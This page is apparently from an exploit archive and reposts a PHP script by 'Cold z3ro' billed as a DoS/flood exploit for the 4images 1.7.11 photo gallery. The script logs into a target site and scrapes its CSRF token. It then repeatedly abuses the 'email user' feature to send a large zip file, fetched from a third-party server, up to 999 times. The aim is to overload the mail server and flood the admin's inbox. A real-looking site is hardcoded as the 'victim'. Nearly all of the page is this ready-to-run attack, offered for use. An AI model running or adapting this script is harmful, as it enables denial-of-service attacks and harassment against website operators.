facebook facebook twitter rss

4images 1.7.11 Ddos/Flood Exploit

Author: Cold z3ro , Published: 09-12-2014
<title> 4images 1.7.11 Ddos/Flood Exploit </title>

<?
/*
4images 1.7.11 Ddos/Flood Exploit
Coded by Cold z3ro, www.hackteach.org | https://www.facebook.com/groups/hackteach.org

this bug will ddos the victim server and also will flood the admin email with big size messages
you need to register to 4images and edit the following:
$user to your username
$pass to your password
*/


$url = "http://www.gamarc.org/photos/"; // change to your victim

// you need to have account on the 4images site.
///////////////////
$user ="z3ro";
$pass = "z3ro";
$userid = "1"; // dont change unless the user_id=1 not found then set this variable to available user_id
// warning : don't set it to your user_id
///////////////////








//// dont edit any thing under this line ////////
ini_set('xdebug.max_nesting_level', 100);
ini_set('memory_limit', 1024 * 1024 * 1024);
ini_set("max_execution_time", "on");

echo "4images 1.7.11 Flood/Dos Exploit - co[d]ed by Cold z3ro<br>";
login($url."/login.php",$user,$pass);
$buff = file_get_contents('http://www.innovative-dsp.com/ftp/X6-400M/StreamPause.zip');
for ($sec =1; $sec <= 999; $sec++)
{
$mb = 2.1 * $sec;
echo src($url."/member.php?action=emailuser", $userid, $mb, $buff);
}

function login($url,$user,$pass)
{
$post = array('user_name'=>$user,
'user_password'=>$pass);
$ch = curl_init();
curl_setopt($ch,CURLOPT_URL,$url);
curl_setopt($ch,CURLOPT_RETURNTRANSFER,true);
curl_setopt($ch,CURLOPT_COOKIEFILE,getcwd().'/coks.txt');
curl_setopt($ch,CURLOPT_COOKIEJAR,getcwd().'/coks.txt');
curl_setopt($ch,CURLOPT_FOLLOWLOCATION,true);
curl_setopt($ch,CURLOPT_POST,true);
curl_setopt($ch,CURLOPT_POSTFIELDS,$post);
curl_exec($ch);
curl_close($ch);
//return $result;
}
function src($url, $userid, $mb, $buff)
{
$ch = curl_init();
curl_setopt($ch,CURLOPT_URL,$url);
curl_setopt($ch,CURLOPT_RETURNTRANSFER,true);
curl_setopt($ch,CURLOPT_COOKIEFILE,getcwd().'/coks.txt');
curl_setopt($ch,CURLOPT_COOKIEJAR,getcwd().'/coks.txt');
//curl_setopt($ch,CURLOPT_FOLLOWLOCATION,true);
$result = curl_exec($ch);
$start='<input type="hidden" name="__csrf" value="';
$end='" />';
$exp = explode($start,$result);
foreach ($exp as $exploded)
{
$exp1 = explode($end,$exploded);
}

$post = array('__csrf'=>trim($exp1[0]),
'user_id'=>$userid,
'message'=>$buff,
'subject'=>'hello');
curl_setopt($ch,CURLOPT_POST,true);
curl_setopt($ch,CURLOPT_POSTFIELDS,$post);
$result = curl_exec($ch);
if(preg_match("/has been sent/", $result))
{
return "Mail server Ddosed & received $mb M Bucket<br>";
flush();
}else{
return "Server killed, Huh !!<br>";
}
curl_close($ch);

//return $result;
}
?>

Like us on Facebook :